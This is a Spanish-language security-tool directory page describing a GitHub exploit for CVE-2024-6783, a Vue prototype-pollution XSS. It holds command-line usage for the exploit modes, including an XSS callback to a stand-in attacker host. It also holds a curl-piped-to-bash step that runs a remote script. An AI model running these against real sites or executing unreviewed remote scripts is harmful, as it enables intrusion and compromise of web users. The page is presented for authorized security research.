Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Herramientas/GitHubGitHub/horkimhab/cve-2024-6783
Análisis de VulnerabilidadesCTFAprendizaje y EducaciónRecursos CuradosRutas de Aprendizaje y CursosLabs y Práctica
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Ver Repositorio
3hace 1 mesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-6783 - Vue CVE

Se ha descubierto una vulnerabilidad en Vue que permite a un atacante realizar XSS mediante contaminación de prototipos. El atacante podría modificar la cadena de prototipos de algunas propiedades como Object.prototype.staticClass o Object.prototype.staticStyle para ejecutar código JavaScript arbitrario.

Donar

Apoya el mantenimiento de este proyecto con PayPal o escaneando el código QR a continuación.

paypal

Código QR para donación

⚡ Uso Simple

Utilice este proyecto únicamente en entornos seguros y autorizados, como:

  • Máquinas virtuales locales
  • Contenedores Docker
  • Configuraciones de laboratorio aisladas
  • Entornos de pruebas de penetración autorizados

Configuración de ejemplo:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Descargar herramienta

Ejemplo de uso:

root@kitploit:~
# scan only 
python cve-2024-6783.py -u https://example.com -v

# Scan & XSS Exploit 
python cve-2024-6783.py -u https://example.com -e xss

# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf

# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Nota:

  • si clonas desde otro proyecto, debes ejecutar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpiar el directorio .git anidado
  • p. ej.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito o Referencias

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 Repositorio Educativo de Investigación en Seguridad

Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.


⚠️ Aviso de Seguridad y Legal

Propósito

Este repositorio es únicamente para investigación de seguridad educativa y autorizada.

Está diseñado para ayudar a los usuarios a aprender sobre:

  • Vulnerabilidades de seguridad
  • Conceptos de sandbox y aislamiento
  • Prácticas de codificación segura y defensiva

Solo para Uso Autorizado

Utilice este repositorio únicamente en entornos donde tenga permiso, como:

  • Laboratorios personales o máquinas virtuales
  • Docker o entornos aislados
  • Pruebas de penetración autorizadas
  • Capacitación en ciberseguridad o investigación académica

El uso no autorizado o ilegal está estrictamente prohibido.


Sin Responsabilidad

El autor y los colaboradores no son responsables de ningún daño, uso indebido, problema legal o pérdida causada por este proyecto.

Al usar este repositorio, aceptas que:

  • Eres responsable de tus propias acciones
  • Lo usarás de manera legal y ética
  • El proyecto se proporciona sin garantía

Uso Ético

Este proyecto está destinado a:

  • Investigación de seguridad defensiva
  • Educación en ciberseguridad
  • Concienciación sobre vulnerabilidades
  • Investigación de sistemas y software seguros

Por favor, sigue las prácticas de divulgación responsable y cumple con todas las leyes aplicables.


Contacto

Para divulgación responsable o colaboración, contacta al mantenedor del repositorio a través de GitHub.